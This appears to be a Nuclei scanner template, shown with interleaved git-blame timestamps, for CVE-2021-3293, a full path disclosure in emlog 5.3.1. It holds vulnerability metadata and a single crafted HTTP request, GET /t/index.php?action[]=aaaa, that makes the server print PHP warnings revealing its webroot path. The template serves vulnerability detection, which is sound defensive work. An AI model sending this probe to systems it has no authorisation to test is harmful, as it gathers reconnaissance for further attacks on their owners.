2022-02-23 08:24:44 +00:00
|
|
|
id: CVE-2021-3293
|
|
|
|
|
|
|
|
info:
|
2022-04-07 13:53:15 +00:00
|
|
|
name: emlog 5.3.1 Path Disclosure
|
2022-02-23 08:24:44 +00:00
|
|
|
author: h1ei1
|
2023-03-21 21:08:12 +00:00
|
|
|
severity: medium
|
2022-04-22 10:38:41 +00:00
|
|
|
description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
An attacker can gain knowledge of the server's file system structure, potentially leading to further attacks.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest patch or upgrade to a version that fixes the vulnerability.
|
2022-02-23 08:24:44 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/emlog/emlog/issues/62
|
|
|
|
- https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md
|
2022-04-07 13:53:15 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-3293
|
2024-03-23 09:28:19 +00:00
|
|
|
- https://github.com/Z0fhack/Goby_POC
|
|
|
|
- https://github.com/20142995/Goby
|
2022-02-23 08:24:44 +00:00
|
|
|
classification:
|
2023-03-21 21:08:12 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
cvss-score: 5.3
|
2022-02-23 08:24:44 +00:00
|
|
|
cve-id: CVE-2021-3293
|
|
|
|
cwe-id: CWE-22
|
2023-10-25 17:36:19 +00:00
|
|
|
epss-score: 0.003
|
2024-06-07 10:04:29 +00:00
|
|
|
epss-percentile: 0.69462
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: emlog
|
|
|
|
product: emlog
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve2021,cve,emlog,fpd
|
2022-02-23 08:24:44 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-02-23 08:24:44 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /t/index.php?action[]=aaaa HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<b>Warning</b>"
|
|
|
|
- "on line"
|
|
|
|
- "expects parameter"
|
2022-04-07 13:53:15 +00:00
|
|
|
condition: and
|
2023-07-11 19:49:27 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-03-25 11:57:16 +00:00
|
|
|
# digest: 4a0a0047304502210096f3228cc4d490adee40d190e6f8d36714ca2e536391b5d273c5a498468135e3022055c714b2300176f083a94f6f93884821c80b2f2a760acd3453b6f62efaef4744:922c64590222798bb761d5b6d8e72950
|